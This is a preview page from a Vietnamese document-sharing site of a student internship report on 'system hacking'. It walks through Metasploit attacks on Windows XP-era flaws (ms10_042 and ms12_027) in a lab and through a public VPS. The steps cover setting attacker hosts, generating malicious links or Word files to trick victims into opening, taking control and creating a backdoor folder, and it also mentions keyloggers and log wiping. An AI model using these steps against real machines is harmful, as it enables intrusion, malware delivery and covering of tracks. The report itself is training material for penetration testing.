1. Trang chủ
  2. » Luận Văn - Báo Cáo

Báo cáo thực tập system hacking

31 448 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 31
Dung lượng 1,5 MB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

Báo cáo thực tập system hacking

Trang 1

BÁO CÁO THỰC TẬP

SYSTEM HACKING

GVHD: Thầy Võ Đỗ Thắng SVTT: Trần Nguyễn Lộc

Trang 3

XP, Windows 7…

Trang 4

Giới thiệu system hacking

Hacker có thể thực hiện mọi thứ trên máy tính đó, gây ra những hậu quả vô cùng nghiêm trọng cho các cá nhân, tổ

chức

Gồm những kỹ thuật lấy username, password dựa vào phần mềm cài trên hệ thống hoặc các dịch vụ từ xa của hệ điều

hành Windows

Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông

tin, xóa những log file hệ thống

Trang 5

Quá trình tấn công vào một hệ thống

Enumerate (liệt kê): Trích ra tất cả những thông tin có thể về user trong hệ thống Sử dụng phương pháp thăm

dò SNMP để có được những thông tin hữu ích, chính

xác hơn

Crack: Công đoạn này có lẽ hấp dẫn nhiều Hackernhất Bước này yêu cầu chúng ta bẽ khóa mật khẩu đăng nhập của user Hoặc bằng một cách nào khác, mục tiêu

phải đạt tới là quyền truy cập vào hệ thống

Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi giới hạn truy cập từ user binh thường lên admin hoặc user có quyền cao hơn đủ cho chúng ta tấn công

Execute (thực thi): Thực thi ứng dụng trên hệ thống máy đích Chuẩn bị trước malware, keylogger, rootkit…để chạy nó trên máy tính tấn công

Hide (ẩn file): Những file thực thi, file soucecode chạy chương trình… Cần phải được làm ẩn đi, tránh bị mục

tiêu phát hiện tiêu diệt

Tracks (dấu vết): Tất nhiên không phải là để lại dấu vết Những thông tin có liên quan đến bạn cần phải bị xóa sạch, không để lại bất cứ thứ gì Nếu không khả năng bạn bị phát hiện là kẻ đột nhập là rất cao

Tóm lại, quá trình tấn công hệ thống (System hacking) là

bước tiếp theo sau quá trình khảo sát, thu thập thông tin của mục tiêu cần tấn công bằng những kỹ thuật như Footprinting, Social

engineering, Enumeration, Google Hacking… đã được áp dụng cho mục đích truy tìm thông tin

Trang 6

Hệ điều hành Backtrack 5 R3

- Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm xâm nhập Backtrack là sự hợp nhất giữa 3 bản phân phối khác nhau của Linux về thâm nhập thử nghiệm IWHAX, WHOPPIX, và Auditor Trong phiên bản hiện tại của

nó (5), Backtrack được dựa trên phiên bản phân phối Linux Ubuntu 11.10

- Backtrack 5 chứa một số công cụ có thể được sử dụng trong quá trình thử nghiệm thâm nhập của chúng ta

Trang 7

Phần mềm Metasploit

• Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về vấn đề lỗ hổng bảo mật cũng như giúp đỡ về kiểm tra thăm nhập và phát triển hệ thống phát hiện tấn công mạng

• Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS

Trang 8

Sơ đồ tổng quan hệ thống mạng LAN

Trong một mạng LAN nội bộ, các máy tính thường kết nối với nhau với khoảng cách vật lý gần như trong một phòng, một tầng, một tòa nhà, công ty, … Các máy tính trong mạng LAN

có thể chia sẻ tài nguyên với nhau, mà điển hình là chia sẻ tập tin, máy in, máy quét và một số thiết bị khác

 Tấn công mạng Lan

Trang 10

Khai thác lổ hổng Ms10-042

Trang 11

Copy đường dẫn, enter gõ use “dán đường dẫn vào”

Gõ show options để thấy các options của lệnh

msf exploit(ms10_042_helpctr_xss_cmd_exec) > show options

Trang 12

 Dùng lệnh set srvhost, lhost, exploit

- Set srvhost 172.16.0.9 -> set địa chỉ IP của máy backtrack 5 R3

- Set lhost 172.16.0.9 -> set địa chỉ IP của máy backtrack 5 R3

- Lệnh exploit để bắt đầu xâm nhập trên máy nạn nhân

Trang 13

 Sau khi thực hiện lệnh exploit , thì sẽ tạo ra 1 đường link chứa mã độc , mà khi nạn nhân kích vào, thì lập tức sẽ nhiễm mã độc và lúc này backtrack 5

sẽ chiếm toàn quyền điều khiển trên máy bạn nhân.(việc lừa nạn nhận kích vào mã độc tùy vào khả năng của hacker như gửi mail hoặc gửi qua facebook …., tùy vào khả năng của mỗi người)

Trang 14

 Tới bước này là ta có thể chiếm được toàn quyền điều khiển trên máy nạn nhân như: xem thông tin trên máy nạn nhân,thêm ,xóa ,sửa file, thư mục … trên máy nạn nhân

Trang 15

 Xem thông tin trên máy nạn nhân

 Tạo thư mục backdoor thành công

Trang 16

Một kẻ tấn công khai thác thành công lỗ hổng có thể lấy được quyền

sử dụng giống như người dùng đăng nhập vào máy tính

Khai thác lổ hỗng ms12-027

Trang 17

 Mở giao diện console của công cụ metasploit bằng dòng lệnh msfconsole

 Search mã lỗi ms12_027 bằng dòng lệnh :search ms12_027

 Tiến hành khai thác mã lỗi bằng dòng lệnh :

use exploit /windows/fileformat/ms12_027_mscomctl_bof

 Xem hệ điều hành có thể khai thác bởi mã lỗi ms12_027

b) Các bước tấn công

Trang 18

 Tiến hành set filename và set lhost

-Lệnh set filename : tạo ra file word có chứa mã độc -Lệnh set lhost : set địa chỉ IP của máy backtrack 5

Trang 19

 Sau khi tạo được mã độc là file word , ta tiến hành sao sao chép file word này lên máy tính nạn nhân bằng nhiều cách như email……Khi nạn nhân mở file word bị nhiễm mã độc, thì ta có thể chiếm được toàn quyền điều khiển trên máy nạn nhân, cụ thể là một sessions mới được tạo ra

Trang 20

-Xem thông tin về máy tính nạn nhân sau khi chiếm toàn quyền điều khiển

-Và có thể thực hiện được những lệnh tấn công khác mà mình muốn

Trang 21

 Khai thác lỗ hỗng window qua mạng

internet

a) Giới thiệu Honeypot

 Honeypot là một hệ thống tài nguyên thông tin được xây dựng với mục đích giả dạng đánh lừa những kẻ sử dụng và xâm nhập không hợp pháp, thu hút sự chú ý của chúng, ngăn không cho chúng tiếp xúc với hệ thống thật Hệ thống tài nguyên thông tin có nghĩa là Honeypot có thể giả dạng bất cứ loại máy chủ tài nguyên nào như là Mail Server, Domain Name Server, Web Server… Honeypot sẽ trực tiếp tương tác với tin tặc và tìm cách khai thác thông tin về tin tặc như hình thức tấn công, công cụ tấn công hay cách thức tiến hành thay vì bị tấn công

Trang 22

b) Sơ đồ tổng quan sử dụng Honeypot để xâm nhập từ xa qua Internet

Trang 23

 Chúng ta – đóng vài trò là Attacker, cần chuẩn bị:

- VPS có địa chỉ IP public, cài đặt sẵn công cụ Metasploit (download tại http://metasploit.org) đóng vai trò là một Honeypot trên mạng

Trang 24

c) Thực hiện khai thác mã lỗi

 Khi thác lỗi ms10_042 trong windows xp

-Mục đích của việc khai thác mã lỗi này là khai thác lỗi css trong help center của IE, sau khi khai thác thành công , ta có thể chiếm toàn quyền điều khiển trên máy nạn nhân

-Các bước tiến hành như sau:

• Khởi động chương trình metasploit trên máy chủ vps

Trang 26

• Dùng lệnh search mã lỗi: để xem mã lỗi có toàn tại để khai thác hay không: Ở đây search 10_042

Trang 27

 Dùng lệnh set srvhost ,lhost , exploit

 Dùng lệnh srvhost 14.0.21.113 : để set địa chỉ ip của máy vps

 Dùng lệnh lhost 14.0.21.113 : để set địa chỉ ip của máy vps

 Dùng lệnh Exploit để thực thi mã đã cài đặt, lúc này 1 đường link chứa mã độc

sẽ được tạo ra , và khi nạn nhân kích vào đường link này thì bị nhiễm mã độc và

ta có thể chiếm toàn quyền điều khiển trên máy nạn nhân

Trang 28

• Đến đây ta chiếm được toàn quyền điều khiển trên máy nạn nhân

Xem thông tin trên máy nạn nhân

Trang 29

Tạo thư mục có tên là thư mục mới

Ngày đăng: 25/04/2016, 00:38

HÌNH ẢNH LIÊN QUAN

Sơ đồ tổng quan hệ thống mạng LAN - Báo cáo thực tập system hacking
Sơ đồ t ổng quan hệ thống mạng LAN (Trang 8)

TỪ KHÓA LIÊN QUAN

w